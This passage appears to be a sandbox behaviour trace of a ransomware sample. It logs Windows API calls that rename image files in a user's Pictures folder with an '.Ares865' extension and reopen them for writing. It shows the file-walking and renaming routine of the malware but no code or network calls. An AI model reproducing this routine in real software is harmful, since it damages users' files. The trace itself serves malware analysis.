param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Lkp05OAqm_.png.Ares865") returned 79 [0093.875] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Lkp05OAqm_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\lkp05oaqm_.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Lkp05OAqm_.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\lkp05oaqm_.png.ares865"), dwFlags=0x1) returned 1 [0093.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Lkp05OAqm_.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\lkp05oaqm_.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.877] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49199) returned 1 [0093.881] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\SZHVDrg1aa85o.png.Ares865") returned 82 [0093.881] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\SZHVDrg1aa85o.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\szhvdrg1aa85o.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\SZHVDrg1aa85o.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\szhvdrg1aa85o.png.ares865"), dwFlags=0x1) returned 1 [0093.882] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\SZHVDrg1aa85o.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\szhvdrg1aa85o.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.882] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=75503) returned 1 [0093.887] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-" [0093.888] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\0C2GlXlTsaR5QR5KFI5w.gif.Ares865") returned 110 [0093.888] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\0C2GlXlTsaR5QR5KFI5w.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\0c2glxltsar5qr5kfi5w.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\0C2GlXlTsaR5QR5KFI5w.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\0c2glxltsar5qr5kfi5w.gif.ares865"), dwFlags=0x1) returned 1 [0093.888] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\0C2GlXlTsaR5QR5KFI5w.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\0c2glxltsar5qr5kfi5w.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.888] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7521) returned 1 [0093.891] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\GnIn7LHmt.jpg.Ares865") returned 99 [0093.891] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\GnIn7LHmt.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\gnin7lhmt.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\GnIn7LHmt.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\gnin7lhmt.jpg.ares865"), dwFlags=0x1) returned 1 [0093.892] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\GnIn7LHmt.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\gnin7lhmt.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.892] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=39381) returned 1 [0093.895] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\HB5VAen9TXxy0d-v.jpg.Ares865") returned 106 [0093.895] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\HB5VAen9TXxy0d-v.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\hb5vaen9txxy0d-v.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\HB5VAen9TXxy0d-v.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\hb5vaen9txxy0d-v.jpg.ares865"), dwFlags=0x1) returned 1 [0093.896] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\HB5VAen9TXxy0d-v.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\hb5vaen9txxy0d-v.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.896] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=58050) returned 1 [0093.900] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z" [0093.901] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z\\AVtsQ.png.Ares865") returned 111 [0093.901] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z\\AVtsQ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\ylmvnt_et06xr0z\\avtsq.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z\\AVtsQ.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\ylmvnt_et06xr0z\\avtsq.png.ares865"), dwFlags=0x1) returned 1 [0093.901] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z\\AVtsQ.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\ylmvnt_et06xr0z\\avtsq.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.901] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=36549) returned 1 [0093.905] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z\\b2SVuL-ul.gif.Ares865") returned 115 [0093.905] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z\\b2SVuL-ul.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\ylmvnt_et06xr0z\\b2svul-ul.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z\\b2SVuL-ul.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\ylmvnt_et06xr0z\\b2svul-ul.gif.ares865"), dwFlags=0x1) returned 1 [0093.911] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z\\b2SVuL-ul.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\ylmvnt_et06xr0z\\b2svul-ul.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.911] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=21971) returned 1 [0093.914] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z\\ybOVwhV.bmp.Ares865") returned 113 [0093.914] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z\\ybOVwhV.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\ylmvnt_et06xr0z\\ybovwhv.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z\\ybOVwhV.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\ylmvnt_et06xr0z\\ybovwhv.bmp.ares865"), dwFlags=0x1) returned 1 [0093.918] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\YlmvNt_eT06xr0Z\\ybOVwhV.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\ylmvnt_et06xr0z\\ybovwhv.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.918] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67045) returned 1 [0093.924] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\O7fP4nBQCt IGdW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\O7fP4nBQCt IGdW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\O7fP4nBQCt IGdW" [0093.925] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\O7fP4nBQCt IGdW\\R5IqZ4vMTstYtOPYu2.bmp.Ares865") returned 124 [0093.925] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\O7fP4nBQCt IGdW\\R5IqZ4vMTstYtOPYu2.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\o7fp4nbqct igdw\\r5iqz4vmtstytopyu2.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\O7fP4nBQCt IGdW\\R5IqZ4vMTstYtOPYu2.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\o7fp4nbqct igdw\\r5iqz4vmtstytopyu2.bmp.ares865"), dwFlags=0x1) returned 1 [0093.927] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\O7fP4nBQCt IGdW\\R5IqZ4vMTstYtOPYu2.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\o7fp4nbqct igdw\\r5iqz4vmtstytopyu2.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.927] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=89756) returned 1 [0093.933] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\O7fP4nBQCt IGdW\\S0nWwCzhdoHvSBhxQ.bmp.Ares865") returned 123 [0093.933] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\O7fP4nBQCt IGdW\\S0nWwCzhdoHvSBhxQ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\o7fp4nbqct igdw\\s0nwwczhdohvsbhxq.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\O7fP4nBQCt IGdW\\S0nWwCzhdoHvSBhxQ.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\o7fp4nbqct igdw\\s0nwwczhdohvsbhxq.bmp.ares865"), dwFlags=0x1) returned 1 [0093.933] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-\\O7fP4nBQCt IGdW\\S0nWwCzhdoHvSBhxQ.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\spxultm2cr2kg9mh4qf-\\o7fp4nbqct igdw\\s0nwwczhdohvsbhxq.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.934] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=46170) returned 1 [0093.937] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl" [0093.938] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl\\2Qrv6OWl.gif.Ares865") returned 97 [0093.938] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl\\2Qrv6OWl.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\ib41cd3kafbzsjsltzl\\2qrv6owl.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl\\2Qrv6OWl.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\ib41cd3kafbzsjsltzl\\2qrv6owl.gif.ares865"), dwFlags=0x1) returned 1 [0093.941] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl\\2Qrv6OWl.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\ib41cd3kafbzsjsltzl\\2qrv6owl.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.942] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=22001) returned 1 [0093.944] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl\\gt6UxC0 cf08HWexfjZS.gif.Ares865") returned 109 [0093.944] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl\\gt6UxC0 cf08HWexfjZS.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\ib41cd3kafbzsjsltzl\\gt6uxc0 cf08hwexfjzs.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl\\gt6UxC0 cf08HWexfjZS.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\ib41cd3kafbzsjsltzl\\gt6uxc0 cf08hwexfjzs.gif.ares865"), dwFlags=0x1) returned 1 [0093.945] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl\\gt6UxC0 cf08HWexfjZS.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\ib41cd3kafbzsjsltzl\\gt6uxc0 cf08hwexfjzs.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.945] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3350) returned 1 [0093.947] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl\\pMuZXN8BFW243Rhs7kv_.bmp.Ares865") returned 109 [0093.947] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl\\pMuZXN8BFW243Rhs7kv_.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\ib41cd3kafbzsjsltzl\\pmuzxn8bfw243rhs7kv_.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl\\pMuZXN8BFW243Rhs7kv_.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\ib41cd3kafbzsjsltzl\\pmuzxn8bfw243rhs7kv_.bmp.ares865"), dwFlags=0x1) returned 1 [0093.948] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl\\pMuZXN8BFW243Rhs7kv_.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\ib41cd3kafbzsjsltzl\\pmuzxn8bfw243rhs7kv_.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.948] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=37398) returned 1 [0093.951] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl\\w8loQe.png.Ares865") returned 95 [0093.951] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl\\w8loQe.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\ib41cd3kafbzsjsltzl\\w8loqe.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl\\w8loQe.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\ib41cd3kafbzsjsltzl\\w8loqe.png.ares865"), dwFlags=0x1) returned 1 [0093.952] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\PfNk15\\ib41cD3kAfbZSJslTzl\\w8loQe.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\pfnk15\\ib41cd3kafbzsjsltzl\\w8loqe.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.952] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=60518) returned 1 [0093.956] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp" [0093.957] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\dxkWKFD3SrT0.gif.Ares865") returned 91 [0093.957] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\dxkWKFD3SrT0.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\obrmftwwauwqwhkp\\dxkwkfd3srt0.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS 